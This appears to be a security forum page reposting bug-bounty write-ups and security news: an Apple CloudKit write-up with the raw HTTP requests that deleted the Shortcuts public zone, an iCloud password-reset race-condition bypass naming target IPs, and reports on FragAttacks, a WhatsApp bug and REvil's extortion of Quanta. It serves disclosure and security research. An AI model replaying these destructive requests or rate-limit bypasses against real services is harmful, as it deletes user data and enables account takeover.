modified the container to com.apple.shortcuts: POST /r/v4/user/com.apple.shortcuts/Production/public/records/modify?team_id=9DCADDBE3F Host: p25-ckdatabasews.icloud.apple.com This worked! I could verify this by using the records/lookup and use one of the UUIDs in the protobuf content to one of the gallery banners from the iOS-app: POST /r/v4/user/com.apple.shortcuts/Production/public/records/lookup?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com Cookie: [MY COOKIES] { "records": [ { "recordName": "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E" } ], "numbersAsStrings": true, "zoneID": { "zoneName": "_defaultZone" } } This gave me: { "records" : [ { "recordName" :"C377CA6A-07D3-4A8A-A85E-3ED27EE9592E", "recordType" :"GalleryBanner", "fields" : { "iphone3xImage" : { "value" : { ... Perfect! This was now my way to talk with the Shortcuts database, the CloudKit connection from the Developer portal for CloudKit allowed me to properly authenticate to the com.apple.shortcut-container. I could now start checking the permissions for the public records. The simplest way to do this was to add a Burp replace rule to replace my own container in any request data, iCloud.com.mycontainer.test, with the Shortcuts container com.apple.shortcuts: When writing stories of how bugs were found, it’s extremely hard to communicate how much time things take, how many attempts were needed to figure things out. And often, the explanation on what actually worked seems really obvious when presented afterwards. I started going through the endpoints from the CloudKit documentation as well as clicking around in the UX from the CloudKit Developer portal. Records in the public scope were not possible to modify or delete. Some of the record types I found in the public scope were indexable, which allowed you to query for them as lists, however, this was all public info anyway. For example, you could use records/query to get all gallery banners: { "query": { "recordType":"GalleryBanner", "sortBy": [] }, "zoneID": { "zoneName":"_defaultZone" } } But that was not an issue, since they were already listed in the app. I looked into subscriptions, which did not really work as expected in the public scope. I looked at the sharing options, but since shortcuts did not use Short GUID sharing, that was not really interesting either. (Z)one more thing… Zones were the last thing I tested. As I mentioned earlier, each scope has zones, and the default zone is called _defaultZone. What is interesting with the Public scope, is that the UX of the CloudKit Developer portal actually tells you that it doesn’t support adding new zones to the Public scope: However, if I made the call to com.apple.shortcuts to list all zones, I could see that they had indeed more zones in the Public scope than just the default one: I could also add new zones: POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com { "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneName":"test" } }, "operationType":"create" } ] } which responded with: { "zones": [ { "syncToken":"AQAAAAAAAAABf/////////+AfEbbUd5SC7kEWsQavq+k", "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"test", "ownerRecordName":"_e059f5dc..." } } ] } but I could not see anything bad with it. I could delete my own zones, but that was about it. Those zones would never be used or interacted with by anyone else. The documentation for zones was limited: There were no other calls than create or delete. I could create a zone, but was there really any impact to this? I wasn’t sure. I signed in to the CloudKit Developer portal with my second Apple ID. I then tried to do the same calls to my first user’s container. { "zones" : [ { "zoneID" : { "zoneName" :"_defaultZone", "zoneType" :"DEFAULT_ZONE" }, "reason" :"Cannot delete all records from public default zone", "serverErrorCode" :"BAD_REQUEST" } ] } So deletion failed if I tried with a different user to my own container, as expected. It wasn’t possible to delete any container’s default zone. Could I do a delete call without actually deleting it, but confirming it in any other way? I did not see a way to do that. My assumption was that a deletion attempt would result in the error above. I decided to try deleting the metadata_zone: { "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"metadata_zone" } }, "operationType":"delete" } ] } It replied with an error: { "zones" : [ { "zoneID" : { "zoneName" :"metadata_zone", "ownerRecordName" :"_2e80...", "zoneType" :"REGULAR_CUSTOM_ZONE" }, "reason" :"User updates to system zones are not allowed", "serverErrorCode" :"NOT_SUPPORTED_BY_ZONE" } ] } This made me sure that the creation of zones wasn’t really an issue. The delete call did not work on existing ones, and there was no impact on being able to create new ones. I also tried the delete call to _defaultZone since I was sure that the error I would see would be the one above: Cannot delete all records from public default zone. At 23 Mar 2021 20:35:46 GMT I made the following call: POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com { "operations": [ { "purge": true, "zone": { "atomic": true, "zoneID": { "zoneName": "_defaultZone" } }, "operationType": "delete" } ] } it responded with: { "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "zoneType" : "DEFAULT_ZONE" }, "deleted" : true } ] } Shit. I did a zones/list again: { "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "ownerRecordName" : "_2e805...", "zoneType" : "DEFAULT_ZONE" }, "atomic" : true }, { "zoneID" : { "zoneName" : "metadata_zone", "ownerRecordName" : "_2e805...", "zoneType" : "REGULAR_CUSTOM_ZONE" }, "atomic" : true } ] } Good, it wasn’t really deleted. I realized that I’ve tested it all and I started to continue looking into other things related to Apple Shortcuts. Suddenly one my shared shortcuts gave a 404: But I just shared it? I quit the Shortcuts app and started it again: Shit. I went to one of the websites sharing a bunch of shortcuts and used my phone to test one: All of them were gone. I know realized that the deletion did somehow work, but that the _defaultZone never disappeared. When I tried sharing a new shortcut it also did not work, at least not to begin with, most likely due to the record types also being deleted. At 23 Mar 2021 20:44:00 GMT I wrote the following email to Apple Security: I explained the situation and confirmed I understood the severity. I also explained the steps I took to avoid causing any service interruptions, since I knew that was against the Apple Security Bounty policy. I explained that creation of zones was indeed possible, but that I did not know if that confirmed that I could also delete zones. Another argument why it was hard to find this bug was that the container made by my other Apple developer account wasn’t vulnerable. Also, the error when trying to delete metadata_zone confirmed that there were indeed permission checks in place. The bug seemed to only allow the _defaultZone to be deleted by anyone on Apple-owned CloudKit containers. I decided to use the case of “I am able to create a zone” as an indicator that this bug existed in other containers owned by Apple. This would show Apple the scope of the issue without me causing any more harm. I was already panicking. Apart from com.apple.shortcuts, the list consisted of 30 more containers with the same issue. I still wasn’t sure if creating a new zone in the public scope did actually prove the ability to delete the default zone, but that’s the closest I got to verifying the issue. Also, the other containers might not have been using the public scope at all and I never confirmed the bug on the other scopes. Apple’s first response came early the morning after: Public response I acknowledged the email and started to see on Twitter that this was in fact affecting a lot of people: There were also some suspicions that this was indeed a move by Apple due to a podcast discussion about using the API to fetch Shortcuts data. A podcast called “Connected” had a discussion on the issue and tried to explain what had happened (Between 26:50 to 40:22). One individual was actually 100% correct identifying the minute of my accidental deletion call: Apple’s response Apple was quite silent after the first request to me to stop testing. They did go public and explain to people that the issue was going to be solved: It took a few days for all data to recover. One other individual shared my assumption on why that was: On April 1st Apple gave the following reply: During the hold out period, I followed up their email again clarifying the steps I took to prevent any service interruption, and tried to explain how limited I was to confirm if the deletion call had worked or not. I also asked them if the creation of a zone was a good indicator of the bug. I got back another response clarifying that creation of a zone was indeed a valid non-destructive way to confirm invalid security controls: I then confirmed that I could not do any of the zone modifications anymore. CloudKit Developer portal was later moved to use the API on api.apple-cloudkit.com instead. Conclusion Approaching CloudKit for bugs turned out to be a lot of fun, a bit scary, and a really good example of what a real deep-dive into one technology can result in when hunting bugs. The Apple Security team was incredibly helpful and professional throughout the process of reporting these issues. Even though the last bug caused an incident, I really tried to explain all my steps to prevent that from happening. The Apple Security Bounty program decided to award $12,000, $24,000 and $28,000, respectively, for the bugs mentioned in this post. Source: https://labs.detectify.com/2021/09/13/hacking-cloudkit-how-i-accidentally-deleted-your-apple-shortcuts/
  8. This article is about how I found a vulnerability on Apple forgot password endpoint that allowed me to takeover an iCloud account. The vulnerability is completely patched by Apple security team and it no longer works. Apple Security Team rewarded me $18,000 USD as a part of their bounty program but I refused to receive it. Please read the article to know why I refused the bounty. After my Instagram account takeover vulnerability, I realized that many other services are vulnerable to race hazard based brute forcing. So I kept reporting the same with the affected service providers like Microsoft, Apple and a few others. Many people mistook this vulnerability as typical brute force attack but it isn’t. Here we are sending multiple concurrent requests to the server to exploit the race condition vulnerability present in the rate limits making it possible to bypass it. Now lets see what I found in Apple. The forgot password option of Apple ID allows us to change our password using 6 digit OTP sent to our mobile number and email address respectively. Once we enter the correct OTP we will be able to change the password. Apple forgot password page prompting to enter mobile number after entering email address For security reasons, apple will prompt us to enter the trusted phone number along with email address to request OTP. So to exploit this vulnerability, we need to know the trusted phone number as well as their email address to request OTP and will have to try all the possibilities of the 6 digit code, that would be around 1 million attempts (10 ^ 6). As for as my testing, the forgot password endpoint had pretty strong rate limits. If we enter more than 5 attempts, our account will be locked for the next few hours, even rotating the IP didn’t help. HTTP POST REQUEST SENT TO FORGOT PASSWORD ENDPOINT AND ITS RESPONSE Then I tried for race hazard based brute forcing by sending simultaneous POST requests to apple server and found a few more limitations. To my surprise, apple have rate limits for concurrent POST requests from single IP address, not just to the forget password endpoint but to the entire apple server. We cannot send more than 6 concurrent POST requests, it will be dropped. It will not just be dropped but our IP address will be blacklisted for future POST requests with 503 error. Oh my god! That is too much 🤯 So I thought they aren’t vulnerable to this type of attack 😔 but still had some hope since these are generic rate limits across the server and not specific to the code validation endpoint. After some testing, I found a few things iforgot.apple.com resolves to 6 IP addresses across the globe – (17.141.5.112, 17.32.194.36, 17.151.240.33, 17.151.240.1, 17.32.194.5, 17.111.105.243). There were two rate limits we have seen above, one is triggered when we send more than 5 requests to forgot password endpoint (http://iforgot.apple.com/password/verify/smscode) and another one is across the apple server when we send more than 6 concurrent POST requests. Both these rate limits are specific to apple server IP which means we can still send requests (with in limits though) to another apple server IP. We can send upto 6 concurrent requests to an apple server IP (by binding iforgot.apple.com to the IP) from single client IP address as per their limits. There are 6 apple IP address resolved as mentioned above. So we can send upto 36 requests across the 6 apple IP address (6 x 6 = 36) from single IP address. Therefore, the attacker would require 28K IP addresses to send up to 1 million requests to successfully verify the 6 digit code. 28k IP addresses looks easy if you use cloud service providers, but here comes the hardest part, apple server has a strange behavior when we try to send POST requests from cloud service providers like AWS, Google cloud, etc. Response for any POST request sent from AWS & Google cloud They reject the POST request with 502 Bad gateway without even checking the request URI or body. I tried changing IPs but all of them returned same response code, which means they have blacklisted the entire ASN of some cloud service providers if am not wrong 🙄 It makes the attack harder for those who rely on reputed cloud services like AWS. I kept trying various providers and finally found a few service providers their network IPs are not blacklisted. Then I tried to send multiple concurrent POST requests from different IP address to verify the bypass. And it worked!!! 🎉🎉🎉 Now I can change the password of any Apple ID with just their trusted phone number 😇 Of course the attack isn’t easy to do, we need to have a proper setup to successfully exploit this vulnerability. First we need to bypass the SMS 6 digit code then 6 digit code received in the email address. Both bypasses are based on same method and environment so we need not change anything while trying the second bypass. Even if the user has two factor authentication enabled, we will still be able to access their account, because 2FA endpoint also shares the rate limit and was vulnerable. The same vulnerability was also present in the password validation endpoint. I reported this information with detailed reproduction steps and a video demonstrating the bypass to Apple security team on July 1st, 2020. Apple security team acknowledged and triaged the issue with in few minutes of report. I didn’t get any updates from Apple after triage so I kept following up for status updates and they said they are working on a fix on Sep 9th, 2020. Again, no updates for next 5 months and then this email came when I asked for status They said they are planning to address the issue in upcoming security update. I was wondering what is taking so long for them to react to a critical vulnerability. I kept retesting the vulnerability to know whether its fixed instead of relying on them. I tested on April 1st, 2021 and realized a patch for the vulnerability was released to production but still there were no updates from Apple. I asked them whether the issue is patched and the response is same as they have no status updates to share. I was patient and waiting for them to update the status. After a month, I wrote them that the issue was patched on April 1st itself and why am not being updated about it, I also told that I wanted to publish the report to my blog. Apple security team asked me whether it is possible to share the draft of the article with them before publishing. That is when things started to go unexpected. After sharing the draft, they denied my claim saying that this vulnerability do not allow to takeover majority of the icloud accounts. Here’s their response As you can see in the email screenshot, their analysis revealed that it only works against iCloud accounts that has not been used in passcode / password protected Apple devices. I argued that even if the device passcode (4 digit or 6 digit) is asked instead of 6 digit code sent to email, it will still share the same rate limits and would be vulnerable to race condition based brute forcing attacks. We will also be able to discover the passcode of the associated Apple device. I also noticed a few changes in their support page regarding forgot password. Link : https://support.apple.com/en-in/HT201487 The above screenshot shows how the page looks now but it wasn’t the same before my report. In October 2020, that page looked like this Link from web archive : http://web.archive.org/web/20201005172245/https://support.apple.com/en-in/HT201487 “In some cases” is prefixed to the paragraph on October 2020, that is exactly after I was told that they are working on a fix in September 2020. It looks like everything was planned, the page was updated to support their claim of only limited users were vulnerable. That page wasn’t updated for years but getting a minor update after my report. It doesn’t look like a coincidence. When I asked about it, they said the updates are made due to changes in iOS 14. What does resetting password using trusted email / phone number has to do with iOS 14 I asked. If that is true, are trusted phone number and email used to reset the password before iOS 14? If that’s the case, my report is applicable to all Apple accounts. I didn’t get any answer from them. I was disappointed and told them that I am going to publish the blog post with all the details without waiting for their approval. Here’s the reply I got from them. They arranged a call with Apple team engineers to explain what they found in their analysis and also to answer any questions I may have. During the call, I asked why it is different from the vulnerability I found. They said that the passcode is not being sent to any server endpoint and is verified in the device itself. I argued that there is no way for a random apple device to know another device’s passcode without contacting Apple server. They said it is true that the data is sent to server but it is verified using a cryptographic operation and they cannot reveal more than that due to security concerns. I asked what if we find out the encryption process through reverse engineering to replicate it and brute force the Apple server with concurrent requests. I didn’t get any definite answer for that question. They concluded that the only way to brute force the passcode is through brute forcing the Apple device which is not possible due to the local system rate limits. I couldn’t accept what Apple engineers said, logically, it should be possible to replicate what Apple device is doing while sending the passcode data to server. I thought to verify it myself to prove them. If what they said is true, passcode validation endpoint should be vulnerable to race condition based brute forcing. After a few hours of testing I found that they have SSL pinning specific to the passcode validation endpoint, so the traffic sent to the server cannot be read by MITM proxy like burp / charles. Thanks to checkra1n and SSL Kill Switch, using their tool I was able to bypass pinning and read the traffic sent to server. I figured out that Apple uses SRP (Secure Remote Password), a PAKE protocol to verify the user knows the right passcode without actually sending it to the server. So what the engineers said is right, they aren’t sending the passcode directly to server. Instead, both server and client do some mathematical calculations using the previously known data to derive at a key (more like diffie-hellman key exchange). Without getting into the specifics of SRP, let me get straight to what is necessary in our context. Apple server has two stored values namely verifier and salt specific to each user created at the time of setting or updating the passcode. Whenever a user initiates a SRP authentication with username and a ephemeral value A, Apple server responds back with the salt of the specific user and a ephemeral value B. Client uses the salt obtained from server to calculate the key prescribed by SRP-6a. Server uses the salt and verifier to calculate the key prescribed by SRP-6a. Finally they both prove to each other that the derived key are same. Read more about the detailed calculations of SRP-6a here. SRP is known to prevent bruteforce attacks as it has user-specific salt and a verifier, so even if someone steals our database, they will still need to perform a CPU intensive bruteforce for each user to discover the password one by one. That gives enough time for the affected vendor to react to it. But, in our case, we don’t have to bruteforce a large number of accounts. Bruteforcing single user is enough to get into their iCloud account as well as finding their passcode. Brute forcing is possible only when you have both salt and verifier specific to the target user. After bypassing the SMS passcode we can easily impersonate as the target user and obtain the salt. But the problem here is verifier. We should either somehow obtain the verifier from server or bypass the rate limit on key verifying endpoint. If the rate limit is bypassed, we can keep on trying different combinations of key obtained using the precomputed values of the passcode until we arrive at the matching key. Obviously, it requires a lot of computation to derive a key of each 4 or 6 digit numeric passcodes (from 0000/000000 to 9999/999999). When we enter the passcode in an iPhone / iPad during password reset, the device initiates SRP authentication by sending the user session token obtained from the successful SMS verification. The server responds back with the salt of the respective user. The passcode and the salt are hashed to then derive the final key which is sent to https://p50-escrowproxy.icloud.com/escrowproxy/api/recover to check whether it matches the key computed (using ephemeral, salt and verifier) on the server. And the POST request sent to verify the key looked like this String tag has all the data mentioned above but are sent in DATA BLOB format. The first thing I wanted to check is rate limit before decoding the values of BLOB. I sent the request 30 times concurrently to check whether the endpoint was vulnerable. To my shock, it wasn’t vulnerable. Out of 30 requests, 29 of them were rejected with internal server error. Rate limiting would be performed in the Apple server itself or in HSM (hardware security module). Either way, the rate limit logic should be programmed as such to prevent race hazard. There is very bleak chance for this endpoint to be not vulnerable to race hazard before my report because all the other endpoints I tested was vulnerable – SMS code validation, email code validation, two factor authentication, password validation was all vulnerable. If they did patch it after my report, the vulnerability became a lot more severe than what I initially thought. Through bruteforcing the passcode, we will be able to identify the correct passcode by differentiating the responses. So we not only can takeover any iCloud account but also discover the passcode of the Apple device associated with it. Even though the attack is complex, this vulnerability could hack any iPhone / iPad that has 4 digit / 6 digit numeric passcode if my assumption is right. Since it is now validating the concurrent requests properly, there is no way for me to verify my claim, the only way I can confirm this is by writing to Apple but they aren’t giving any response in this regard. I got the bounty email from Apple on June 4th, 2021. The actual bounty mentioned for iCloud account takeover in Apple’s website is $100,000 USD. Extracting sensitive data from locked Apple device is $250,000 USD. My report covered both the scenarios (assuming the passcode endpoint was patched after my report), so the actual bounty should be $350,0000. Even if they chose to award the maximum impact out of the two cases, it should still be $250,000 USD. Selling these kind of vulnerabilities to government agencies or private bounty programs like zerodium could have made a lot more money. But I chose the ethical way and I didn’t expect anything more than the outlined bounty amounts by Apple. https://developer.apple.com/security-bounty/payouts/ But $18,000 USD is not even close to the actual bounty. Lets say all my assumptions are wrong and Apple passcode verifying endpoint wasn’t vulnerable before my report. Even then the given bounty is not fair looking at the impact of the vulnerability as given below. Bypassed the two factor authentication. It is literally like 2FA doesn’t exist due to the bypass. People who are all relying on 2FA are vulnerable. This itself is a major vulnerability. Bypassed the password validation rate limits. All the Apple ID accounts that use common / weak / hacked passwords are vulnerable even if they have two factor authentication enabled. Once hacked, the attacker can track the location of the device as well as wipe the device remotely. 2014 celebrities iCloud hack is majorly because of weak passwords. Bypassed the SMS verification. If we know the passcode or password of the device associated with the iCloud account. Lets say any of your friends or relatives knows your device passcode, using this vulnerability, they can takeover your iCloud account and also can erase your entire device remotely over the internet without having physical access to it. We can takeover all Apple IDs that are not associated with a passcode protected Apple device due to both SMS and email verification code bypass, which means Any apple device without passcode or password, like anyone who turned off or didn’t set the passcode / password. Any Apple ID created without apple device, like in browsers or in an android app and not been used in password protected apple devices For example, 50 Million+ android users have downloaded Apple music app. In those, majority of them may not have used Apple devices. They are still Apple users and their information like credit cards, billing address, subscription details, etc could be exposed. They need not reward the upper cap of the iCloud account takeover ($100k) but it should at least be close to it considering the impact it has created. After all my hard work and almost a year of waiting, I didn’t get what I deserved because of Apple’s unfair judgement. So I refused to receive the bounty and told them it is unfair. I asked them to reconsider the bounty decision or let me publish the report with all the information. There wasn’t any response to my emails. So I have decided to publish my article without waiting for their response indefinitely. Therefore, I shared my research with Apple for FREE of cost instead of an unfair price. I request Apple security team to be more transparent and fair at least in the future. I would like to thank Apple for patching the vulnerability. I repeat, the vulnerability is completely fixed and the scenarios described above no longer works. Thank you for reading the article! Please let me know your thoughts in comments. Source: https://thezerohack.com/apple-vulnerability-bug-bounty
  9. Venmo Xoom Braintree Payments Swift Financial/ Loanbuilder Hyperwallet Astea sunt in scop in programul lor de bug bounty.
  10. Sincer, sunt multumit de cat am primit. Fata de altii, ce sa mai spun. 😅
  11. O vulnerabilitate pe care am descoperit-o in https://www.xoom.com/. Aplicatia este detinuta de cei de la PayPal. Este o problema mai veche. Recompensa: 5,300$
  12. Three design and multiple implementation flaws have been disclosed in IEEE 802.11 technical standard that undergirds Wi-Fi, potentially enabling an adversary to take control over a system and plunder confidential data. Called FragAttacks (short for FRgmentation and AGgregation Attacks), the weaknesses impact all Wi-Fi security protocols, from Wired Equivalent Privacy (WEP) all the way to Wi-Fi Protected Access 3 (WPA3), thus virtually putting almost every wireless-enabled device at risk of attack. "An adversary that is within radio range of a victim can abuse these vulnerabilities to steal user information or attack devices," Mathy Vanhoef, a security academic at New York University Abu Dhabi, said. "Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities." IEEE 802.11 provides the basis for all modern devices using the Wi-Fi family of network protocols, allowing laptops, tablets, printers, smartphones, smart speakers, and other devices to communicate with each other and access the Internet via a wireless router. Introduced in January 2018, WPA3 is a third-generation security protocol that's at the heart of most Wi-Fi devices with several enhancements such as robust authentication and increased cryptographic strength to safeguard wireless computer networks. According to Vanhoef, the issues stem from "widespread" programming mistakes encoded in the implementation of the standard, with some flaws dating all the way back to 1997. The vulnerabilities have to do with the way the standard fragments and aggregates frames, allowing threat actors to inject arbitrary packets and trick a victim into using a malicious DNS server, or forge the frames to siphon data. The list of 12 flaws is as follows — CVE-2020-24588: Accepting non-SPP A-MSDU frames CVE-2020-24587: Reassembling fragments encrypted under different keys CVE-2020-24586: Not clearing fragments from memory when (re)connecting to a network CVE-2020-26145: Accepting plaintext broadcast fragments as full frames (in an encrypted network) CVE-2020-26144: Accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network) CVE-2020-26140: Accepting plaintext data frames in a protected network CVE-2020-26143: Accepting fragmented plaintext data frames in a protected network CVE-2020-26139: Forwarding EAPOL frames even though the sender is not yet authenticated CVE-2020-26146: Reassembling encrypted fragments with non-consecutive packet numbers CVE-2020-26147: Reassembling mixed encrypted/plaintext fragments CVE-2020-26142: Processing fragmented frames as full frames CVE-2020-26141: Not verifying the TKIP MIC of fragmented frames A bad actor can leverage these flaws to inject arbitrary network packets, intercept and exfiltrate user data, launch denial-of-service attacks, and even possibly decrypt packets in WPA or WPA2 networks. "If network packets can be injected towards a client, this can be abused to trick the client into using a malicious DNS server," Vanhoef explained in an accompanying research paper. "If network packets can be injected towards an [access point], the adversary can abuse this to bypass the NAT/firewall and directly connect to any device in the local network." In a hypothetical attack scenario, these vulnerabilities can be exploited as a stepping stone to launch advanced attacks, permitting an attacker to take over an outdated Windows 7 machine inside a local network. But on a brighter note, the design flaws are hard to exploit as they require user interaction or are only possible when using uncommon network settings. The findings have been shared with the Wi-Fi Alliance, following which firmware updates were prepared during a 9-month-long coordinated disclosure period. Microsoft, for its part, released fixes for some of the flaws (CVE-2020-24587, CVE-2020-24588, and CVE-2020-26144) as part of its Patch Tuesday update for May 2021. Vanhoef said an updated Linux kernel is in the works for actively supported distributions. This is not the first time Vanhoef has demonstrated severe flaws in the Wi-Fi standard. In 2017, the researcher disclosed what's called KRACKs (Key Reinstallation AttACKs) in WPA2 protocol, enabling an attacker to read sensitive information and steal credit card numbers, passwords, messages, and other data. "Interestingly, our aggregation attack could have been avoided if devices had implemented optional security improvements earlier," Vanhoef concluded. "This highlights the importance of deploying security improvements before practical attacks are known. The two fragmentation based design flaws were, at a high level, caused by not adequately separating different security contexts. From this we learn that properly separating security contexts is an important principle to take into account when designing protocols." Mitigations for FragAttacks from other companies like Cisco, HPE/Aruba Networks, Juniper Networks, and Sierra Wireless can be accessed in the advisory released by the Industry Consortium for Advancement of Security on the Internet (ICASI). "There is no evidence of the vulnerabilities being used against Wi-Fi users maliciously, and these issues are mitigated through routine device updates that enable detection of suspect transmissions or improve adherence to recommended security implementation practices," the Wi-Fi Alliance said. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/05/nearly-all-wifi-devices-are-vulnerable.html
  13. Facebook-owned WhatsApp recently addressed two security vulnerabilities in its messaging app for Android that could have been exploited to execute malicious code remotely on the device and even exfiltrate sensitive information. The flaws take aim at devices running Android versions up to and including Android 9 by carrying out what's known as a "man-in-the-disk" attack that makes it possible for adversaries to compromise an app by manipulating certain data being exchanged between it and the external storage. "The two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions," researchers from Census Labs said today. "With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise protocol keys used for end-to-end encryption in user communications." In particular, the flaw (CVE-2021-24027) leverages Chrome's support for content providers in Android (via the "content://" URL scheme) and a same-origin policy bypass in the browser (CVE-2020-6516), thereby allowing an attacker to send a specially-crafted HTML file to a victim over WhatsApp, which, when opened on the browser, executes the code contained in the HTML file. Worse, the malicious code can be used to access any resource stored in the unprotected external storage area, including those from WhatsApp, which was found to save TLS session key details in a sub-directory, among others, and as a result, expose sensitive information to any app that's provisioned to read or write from the external storage. "All an attacker has to do is lure the victim into opening an HTML document attachment," Census Labs researcher Chariton Karamitas said. "WhatsApp will render this attachment in Chrome, over a content provider, and the attacker's Javascript code will be able to steal the stored TLS session keys." Armed with the keys, a bad actor can then stage a man-in-the-middle attack to achieve remote code execution or even exfiltrate the Noise protocol key pairs — which are used to operate an encrypted channel between the client and server for transport layer security (and not the messages themselves, which are encrypted using the Signal protocol) — gathered by the app for diagnostic purposes by deliberately triggering an out of memory error remotely on the victim's device. When this error is thrown, WhatsApp's debugging mechanism kicks in and uploads the encoded key pairs along with the application logs, system information, and other memory content to a dedicated crash logs server ("crashlogs.whatsapp.net"). But it's worth noting that this only occurs on devices that run a new version of the app, and "less than 10 days have elapsed since the current version's release date." Although the debugging process is designed to be invoked to catch fatal errors in the app, the idea behind the MitM exploit is to programmatically cause an exception that will force the data collection and set off the upload, only to intercept the connection and "disclose all the sensitive information that was intended to be sent to WhatsApp's internal infrastructure." To defend against such attacks, Google introduced a feature called "scoped storage" in Android 10, which gives each app an isolated storage area on the device in a way that no other app installed on the same device can directly access data saved by other apps. The cybersecurity firm said it has no knowledge on whether the attacks have been exploited in the wild, although in the past, flaws in WhatsApp have been abused to inject spyware onto target devices and snoop on journalists and human rights activists. WhatsApp users are recommended to update to version 2.21.4.18 to mitigate the risk associated with the flaws. When reached for a response, the company reiterated that the "keys" that are used to protect people's messages are not being uploaded to the servers and that the crash log information does not allow it to access the message contents. "There are many more subsystems in WhatsApp which might be of great interest to an attacker," Karamitas said. "The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games might be unwillingly exposing a similar attack surface to remote adversaries." Sursă: https://thehackernews.com/2021/04/new-whatsapp-bug-couldve-let-attackers.html
  14. Prominent Apple supplier Quanta on Wednesday said it suffered a ransomware attack from the REvil ransomware group, which is now demanding the iPhone maker pay a ransom of $50 million to prevent leaking sensitive files on the dark web. In a post shared on its deep web "Happy Blog" portal, the threat actor said it came into possession of schematics of the U.S. company's products such as MacBooks and Apple Watch by infiltrating the network of the Taiwanese manufacturer, claiming it's making a ransom demand to Apple after Quanta expressed no interest in paying to recover the stolen blueprints. "Our team is negotiating the sale of large quantities of confidential drawings and gigabytes of personal data with several major brands," the REvil operators said. "We recommend that Apple buy back the available data by May 1." Since first detected in June 2019, REvil (aka Sodinokibi or Sodin) has emerged as one of the most prolific ransomware-as-a-service (RaaS) groups, with the gang being the first to adopt the so-called technique of "double extortion" that has since been emulated by other groups to maximize their chances of making a profit. The strategy seeks to pressure victim companies into paying up mainly by publishing a handful of files stolen from their extortion targets prior to encrypting them and threatening to release more data unless and until the ransom demand is met. The main actor associated with advertising and promoting REvil on Russian-language cybercrime forums is called Unknown, aka UNKN. The ransomware is also operated as an affiliate service, wherein threat actors are recruited to spread the malware by breaching corporate network victims, while the core developers take charge of maintaining the malware and payment infrastructure. Affiliates typically receive 60% to 70% of the ransom payment. Ransomware operators have netted more than $350m in 2020, a 311% jump from the previous year, according to blockchain analysis company Chainalysis. The latest development also marks a new twist in the double extortion game, in which a ransomware cartel has gone after a victim's customer following an unsuccessful attempt to negotiate ransom with the primary victim. We have reached out to Quanta for comment, and we will update the story if we hear back. However, in a statement shared with Bloomberg, the company said it worked with external IT experts in response to "cyber attacks on a small number of Quanta servers," adding "there's no material impact on the company's business operation." Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursă: https://thehackernews.com/2021/04/hackers-threaten-to-leak-stolen-apple.html
  15. Datele de acces și numerele de telefon din imaginile postate de ministrul Nicolae Ciucă au fost blurate de digi24.ro. Ministrul Apărării, Nicolae Ciucă, a publicat pe contul său de Facebook o serie de imagini din Academia Forțelor Terestre „Nicolae Bălcescu”, din Sibiu, pe care o vizitase în cursul zilei de marți. Însă în una dintre aceste poze apar și date de acces ale unor conturi și videoconferințe plus numere de telefon folosite de angajați ai unui call center MApN din Sibiu. ACTUALIZARE "Fotografiile au fost realizate în Call Center-ul MApN și imediat ce a fost semnalată situația au fost înlăturate de echipa de comunicare care administrează pagina oficială a ministrului. Vă informăm ca nu au existat accesări sau intenții de accesare. Parolele au fost schimbate imediat", a transmis Ministerul Apărării Naționale. "Împreună cu colegii mei parlamentari din comisiile de apărare am vizitat astăzi, la Sibiu, Academia Forțelor Terestre „Nicolae Bălcescu”, una dintre cele mai moderne instituții de învățământ universitar din România. Prima vizită în unități ale MApN a membrilor Comisiilor pentru apărare din Senat şi Camera Deputaților a fost într-o instituție de învățământ superior pentru a vedea care sunt valorile sistemului de formare, educare și dezvoltare a leadership-ului militar, acolo unde se pregătesc ofiţerii din cea mai numeroasă categorie de forţe a Armatei României. Împreună cu şeful Statului Major al Apărării, generalul-locotenent Daniel Petrescu, le-am prezentat parlamentarilor misiunile, prioritățile și programele de înzestrare ale Armatei României – în derulare și de perspectivă. Președinții celor două comisii, senatorul Nicoleta Pauliuc și deputatul Constantin Șovăială, cât şi parlamentarii prezenţi în delegație și-au exprimat disponibilitatea de a lua parte, în viitor, la mai multe astfel de activități, care au rolul de a aprofunda relațiile dintre Comisiile de apărare și Ministerul Apărării Naționale și de a dezvolta o colaborare fructuoasă în domeniul securității și apărării. Precizez că desfășurarea activității a fost adaptată actualului context pandemic, fiind respectate toate măsurile de distanțare și protecție sanitară", arată postarea ministrului, însoțită de imagini din interiorul clădirii Academiei Forțelor Terestre „Nicolae Bălcescu”, din Sibiu. Datele de logare afișate pe o tablă sunt ale persoanelor care lucrează în call-centerul Armatei din Sibiu. La câteva ore după postarea imaginii și a publicării în media, poza respectivă a fost scoasă. Însă aceasta a devenit virală, circulând pe social media. Sursa: https://www.digi24.ro/stiri/actualitate/social/gafa-a-ministrului-apararii-nicolae-ciuca-a-postat-din-greseala-pe-facebook-parole-de-acces-ale-unui-call-center-al-armatei-1473031 Shit happens. 🤣
×
×
  • Create New...